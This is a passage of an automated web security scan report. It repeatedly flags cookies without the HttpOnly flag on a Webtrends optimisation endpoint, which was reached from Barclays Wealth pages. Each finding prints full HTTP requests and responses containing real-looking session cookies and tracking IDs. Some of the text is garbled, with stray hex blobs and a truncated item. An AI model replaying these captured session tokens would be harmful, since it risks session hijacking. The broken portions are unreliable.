8fd265cac7ff7d2aa2f84703550ddfe041297690c59ec1f167d8dfc46fcf9b6a54c900e3f0f871e03907594d7fec7fc962263bfbe4c4fcbc37384fe4c9773a3d90f3d6c7a1ee82496
fef6892ae07e3c37421263991e1d4f4f859c94e666602185c0195e8e6e40b68dd776316180742540a5fe8197a61073948b75c3d2d2743d215580b95fe6198878c5ae4afea01fc315fff1c0f08454a431f6ca93989158c79e52e227f317cb936862b716ee9313c310fb3fa7b844b4b7341bd9be7417b77d4ac8f0843cee10e532d1554f1ca8eb1ed62e045feb7103ee4dac

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d504097cbad24c4491d2a045edacbe7667b7643201395ddd85935675175c2e3597d81ec7f77c301528f0861619836210bd15e01494161f679046cd3ea440fb65c7801b6cdb15c0785ae23675645c05656ca824ea267721a956b4efe2a70bb4a76e10e7dd20fd29b3a81b5750cdf2a0cc8797498b0d77d29a74fbf96b7b6e3c60a8857ef6a272aa8452aec9d28be22b017eee772082045063f7e71611fc50474a14b96c5ab6704433fe2c1924450cbb12cc6dc90af1baf8eb7312f98881c095128342ff6ebd195c91f75d256f50ac52435d87d5eec6987458d691f829e41c42bb155bb08fcd5bd1f74fc32416419512e7cb5a6cd89db8810cdfa0a51c643857d59951e507d1400b9b073b6ab3b36c8eaffeb0f929970df96436a30b4fa6470879f0efba452729e84590365c8753a7ac1acd32ddb2443389c60abd3a6dab46c4a608f50c9e15de0037ed6b1ae3319b1bcb723ee78c35dc07ea0cc864222e705f96ffd2e9d56d66cce5eb8ad9c8ad8aafe3123b4ab7c9cfcad9054541d04d6612d704df5a022577d15ecc48aaf2e4a950b26f0b05e66a7702622fc0625c313579f3bd79799735204a6510146c52939f4ccd9df3e32fb15379db23b73344102a3eeae3eb3751524747b92984b3c5ad41dd4a57ce8e2316fd42cb4c09ae70fb970ecda573add4e4390d4333b37ba6fb487f3a5629cc933a1a4680689efff139f492a0fc588034a0410477017f8a91175c5f0703e9e61c1b0b8ebadb470b46e8bdee41d551bb144dd49fbbcfb06257204ab318c420597c3aab5de028ca8ead9c0c6361a45dc91dc1caffd1833127563356b0db5ec60255faaddf01a089ae4e888fd6cb384a11d05b6a436a147e0b449029e123a75f8010173061ce75992612c40813de24754e6cef0f27c55d400e8a8f9604f546d5f449a6b580f8fd265cac7ff7d2aa2f84703550ddfe041297690c59ec1f167d8dfc46fcf9b6a54c900e3f0f871e03907594d7fec7fc962263bfbe4c4fcbc37384fe4c9773a3d90f3d6c7a1ee82496fef6
892ae07e3c37421263991e1d4f4f859c94e666602185c0195e8e6e40b68dd776316180742540a5fe8197a61073948b75c3d2d2743d215580b95fe6198878c5ae4afea01fc315fff1c0f08454a431f6ca93989158c79e52e227f317cb936862b716ee9313c310fb3fa7b844b4b7341bd9be7417b77d4ac8f0843cee10e532d1554f1ca8eb1ed62e045feb7103ee4dac HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/important-information.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E7131C81E64A38E81B17329B424FCCDB; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a04d7d1af; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d0406738a; _wt.mode-79569=fcdcc722e93204194090

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:15 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=DE896946856589AC32A1D6B5BBB2DDE9; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.48. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/about-us/corporate-social-responsibility.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=436AD3879C2C3E6CD9AACE2057A0AD3B; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc2008dfa14; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d042f457f; _wt.mode-79569=fcdcc722e93202d188d0

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:05 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=93530B2177889BE5371E306CA55F4229; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.49. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: JSESSIONID, _wt.control-79569-ta_11ApplyNowStep2ABn, _wt.conversion-79569-ta_11ApplyNowStep2ABn and _wt.mode-79569 (see the Set-Cookie headers in the response below). One of these cookies appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fc2253380d08e93542b96517e511b5024aa3b75cd09538917af6b539c67155cac21e5eaadebfa5c165966f3e8d64be9cc11e428ada21d52b941f155f2c7fd5ae51c72d1b6b3fc444ba911dd0eb36d00226bba2f1f07043b7d373af140c3d72e4ce9144f477f144dbbe2aa0a5502146af4c2da51ea9c097ecf8bdcc40c98492ffab552a828d98a0001e5ea4bebef45674d82504d813ae8f15cb47e034cff9831fb8a133e7bdf048e0529a29fdffb5fc507e1dd3d8224f0e7535247816ab7e2f3128e700fdaf677311b3bc03c8657a9892b68b7c936edb741a0703e3af0eb8e2f7769510c8d5688d58f19841a0fb443c9a37f184cf67d2d5f865902b6e97f0c62d150dc223387a7b4dd74dc50ebc4d007b9aa2db30b1075522b07f21aa49a62d2fd02d7b633a85ff89adac9b6f154ca2ede7288f351de7ddeb9b3f16a355edb81c0585f70898ca895aa2e049338708cd59e1c09515a8f11349b5c7eb78c6bd0b3060afdda24afa1ff5891ccd145c58445ad5b0528b0cc517a5de32ad9e64448451e83742d05d3d1af419a181c0d0ce8a4bd4abf8fb42f71901fe35b33672819331528c438f8bf1eec29865a379a739e9a41a8949f42cf47e07fea1573dea5ef78b66d84e27628451c6ce1534c404e2db34066a99d16d913ec2824d076b25853482578dc692e7eb0cab571b23e85f3ba9659f21842675cfe1f8b03dfad10b2eb250fa534e03a7ffb9a0c64777719b2929360bd43585b5887b09064e7d77a84066bb4a72e4cee5b950cc10aa786ce7e8c4deeafdfa43d52fa5106c3529e2ba7d6f5ef2265a17b4ea2b3ec190f8f6f2e75877beba742ebd7c0895fa47a1f03e78ac239aa93b8895698c112c5114fa8eaa7257e13442abfaf3323cc0f05a5224b7eaa494e37fdcf062c28741867e111f466cdf056867b6349b074432844bffd0a13cefc01c33436c4c7
af66460b02cf60df7e139f815a7fc29453e99f5d9a3d648a226df3e31e81910dd1950506b7a0df6a3d3c16c4fe58db28d496bacb65a09449235004d8490d51ba17347b8de5c9e3cd01d2f3e49aba552de700136f3f HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/private-banking.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=699E9E21874BEC698EE100FEE3749834; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c73ae63744334ae8cef4967d1912276c4668924ff5e00a6078cb239e3f1b573242cbd9b707a451092fc680a56b548caeb5a3f96f49b427787e772f8662a4191929dc9447c4758dd37c9d02690b0b; _wt.mode-79569=fcdcc722e932047ca940; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a025a8920

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:06 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=DD03FBD6C5716741DEF4FC9264E5B178; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02b1d29a; Expires=Sun, 01-Jan-2012 00:02:07 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=04434c6e; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93202cf02d7; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.50. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: JSESSIONID, _wt.control-79569-ta_11ApplyNowStep2ABn, _wt.conversion-79569-ta_11ApplyNowStep2ABn and _wt.mode-79569 (see the Set-Cookie headers in the response below). One of these cookies appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/international-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=46EC8A693A8B058A0B9D418F6DDAF0B4; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d01953baa; _wt.mode-79569=fcdcc722e93201eda062; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc200599559

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:13 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=4B58DD7DB5603E2D9048FE4EA69A8782; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=f4be6fb10e561e19b362e17be8e54985a21e7d8c08da7565c9f725264895b2de21195dd232f468eb32a502163635a3366bc906e51ea492f77d4072456b73d3258873d1d51fd5a6e43f8c56ecc851bb0bfa65887ddf50cc1df578ccf8210063e053; Expires=Sun, 01-Jan-2012 00:02:13 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=024cc5f8; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e9320537bb59; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.51. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: JSESSIONID, _wt.control-79569-ta_11ApplyNowStep2ABn, _wt.conversion-79569-ta_11ApplyNowStep2ABn and _wt.mode-79569 (see the Set-Cookie headers in the response below). One of these cookies appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fc2253380d08e93542b96517e511b542aaa3d70cb1e0dc106a2655b9c690414e024f1e6a5ebef05104b3affb2d300d3ba13ab148586063b9465c74acbf1fc5afc572d8ef7eaa30424a919dd15a02b564226867a487a382664224fb809c7c52d40b1580f15254504f8a5ff471b010808f8ce9544a19a096fcddf929f12805060f4fb49a530dd811d17f4e248f1e60729408e1156de32fdf347a43d1503f98735b79011746cdd4998406eb2d28aeb14f0309cb412e120f1fe554a59b3179284872fd87a41dcf777320427c4618149e6dd2e3cffd464b9e247b922373da9eb8e6f747d4c08ff569ed5e862855153c564f292731a68e363047da6602d8ef36b0a1fd177ed1013dd9b98c161dc49d7ebd71ca1f848e155462d482710f714a6967ad6fd00d2b733a95bfd99cdcba4b20d9c7eb4358ff95f8e0199b9a2ec2d2d508dacc249533fc4bd8392b12f48863b678bc28259593f538b6377dc0329c8d02db4f25a43f7a350efb2f64bc3c0d14d9e8941e60f502ae5ce5c7556ea2d96ee5f520271e5606a0c8495a0539d06194009eebce941bc8db37370cb14e0182c7045207e59769023f0af16fb66943d5fde3690d800f18fc85ccb4cb77ae91e7b83aeea35b07a8ca9306b1b4b7cf71506577c4b8931578c8c4ace42ea6b3acb1ba01a1b127c2fd87c7a71e199ea67bf2ddaa2ee9602fc1b443006fb1a8909dfac44e7bf2419b8248e7e3ee08b4763356a1cb8c39d6aad4f4e080e84e6c232e3da7885036be3f37a49be5bc50c925bf1c0803db92a81d8ebd57958e85a54801d8440cc9ab8b47b71ab3b4beae1ee1e0b836a7822832da4af42efd8c08456aa231a1ee4dfc738fdcbe5825a97da13c5141daae6ac2c2743582bafe0284aa71b10fc740d22be405463fad7012d30764967e212af6893ab5493642723dd320f211eabf21141d8b11bfa5e75d5c9
ed75494c528537d97b42cb8c0025cb9549bb825e872c76d2787ab9f054c5f74d96d8590cb1f3c76b353116c4bf579c7783c1ba996ba09f1822530fdf1e5c53be163324ccfbdb8c8943cbb0f1c6ea0567a38996463ff640871e522cf06a8bd0949d4f07bf9a1e46b06977a35ddb5ca9ca720a72e8f86382e28ef500f7ba93257f248ec2a39ddcb0b103fc761ec7e4c2383e3e3327999a53b1d4c787d82281d328d774bc28f5699a12e4019e69f577869d9a94295dd6a3700cf404471c468cf0af1974f33ed9c8334ffbcf58d75de5c29d707e86f0fec7e75be0cec35d708a37a7cbd18da5204fb9269ead80e0c452c3447f92a91b6f88ef0823f446e3e1dde6b1c22a150443b360b1cf099febe2341f150551973e6767eb68963ec7a37597033d90b2780c8d3c26439eef5af6e82db9f838ba89111585c38860a5bf001dc8c3 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/international-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=59A67E9E4A42771D4AE9AAE699FFE647; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d016e163d; _wt.mode-79569=fcdcc722e9320333bd69; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a031a36ee

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:29:52 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=9EE5E42568221972B90415F936FA1D9A; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02420171; Expires=Sun, 01-Jan-2012 00:29:52 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=03c4ccee; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93200db2e76; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.52. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fca292890d6cd87536c914b721f181414af3343fe0e138920aa65419774524be075b2b5f1b2ab1843066aece8f71bddba05ab23869f2955d227d572dab9ed5efa167bc2bca8e25175f55d8517e1334f21288737072c7d27637d16f854c0dd280fa75c5005264714eabeb75412061049f5d29109a198147ec69f9b9f16cd432dbab74fa42fd1960054baf005cfc3345776ae2b78b506d2cf4ee9305215f3c36ab8d804343c9f17c24d6eec92d5a4068d44f3d6279640d681363e30e10dcb959a7fae6a40cb8c5c464066a6609612e1ca6d7cbebb13dacd2ed9055d5fa282c9392f2b0059e61cc683da74b2574cfa23bac627512bab396e0ec31846f4870c6b1fbb2aa9415784daeb8b66c15ffadddd07aeb250f9460b6b057407ef01cffd2193a454c3b83fa845fc98ded6bef457c93bc17ecaa9069b0e82f4e8a17e214d9cc28208446593ebc1ceef705486376b84c3971b165140960058f31a24ebdd78dda40e1df4d33cb0a0e25895c8df49c4854bbb5c1435a5a6373611b67fd5ed4455456dfe5e061dc59eef4191141e0d0cebbbbb4cb781b92e7e8616fb483130032b2512378536e0c258ba2bc76a069b759c8c4ea58f9b5ac759a529801d7ba7eda93afe0ddabb50284d0f2dd2330e40235b893f0fdbdc19c91fed6c3b901ef11a4e147b7d807d2f22b5c5ed60ec2985a5eec30af349443453a8158905daaa4ab3ef284cba238d2b33eddc4838376817bec49561a8484b5e5486b69e61b6d77380006cb4f07b4abc0e97049d0da6d59f2b8d1abaf88ef36907fd525691579327f18efee02836a77f4df2e3be17598d3b2e778029bba743ee8ccd845ea6294f06e2decf38abc4ebd95b95c510c7161faabbad762f454429e9f43927ce5a51f3771c7da9144261adc801782c234a62e741a2649cf5409d6a5228dd012b0f5fb3ea5a14d8b11bfa7674
8fc9f8331643549233dc7357c4975f7e97c004bd9e5dcc60318d2b38ade449d6cd0bc0da163ca2e2c4297f6152d0aa548b27d987e3d839ab944c7f560e8e4b0e52bf46302a88e7cdea9f0e86a7b4c0a01e32ab8b90482efe55db125a2ff53fdd80c39a4807bd9d1e13e56e2da4058f0ffb9d7d0d21e8f86286b288f55fa6e898222c74dd91f19e8bb4e607fd2a4bc0e3c538383c327191ca03e7849185da7384812fda77ed78a439991ce205c96df42fd8c9cc937c5383f7250ca2061e1f47daf3fa197aa139df9f6e4efa9e59d75be2c49820728fa1f9c7ef5bb6cc9e0e218461a09d818da52d4bb27dcbf682b79452c84d2c97a61e3989ef5a27a040eceed8b1e79127130111b637e59e539ee9b1314215045bc86f7123a277006a15b4

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fca292890d6cd87536c914b721f181414af3343fe0e138920aa65419774524be075b2b5f1b2ab1843066aece8f71bddba05ab23869f2955d227d572dab9ed5efa167bc2bca8e25175f55d8517e1334f21288737072c7d27637d16f854c0dd280fa75c5005264714eabeb75412061049f5d29109a198147ec69f9b9f16cd432dbab74fa42fd1960054baf005cfc3345776ae2b78b506d2cf4ee9305215f3c36ab8d804343c9f17c24d6eec92d5a4068d44f3d6279640d681363e30e10dcb959a7fae6a40cb8c5c464066a6609612e1ca6d7cbebb13dacd2ed9055d5fa282c9392f2b0059e61cc683da74b2574cfa23bac627512bab396e0ec31846f4870c6b1fbb2aa9415784daeb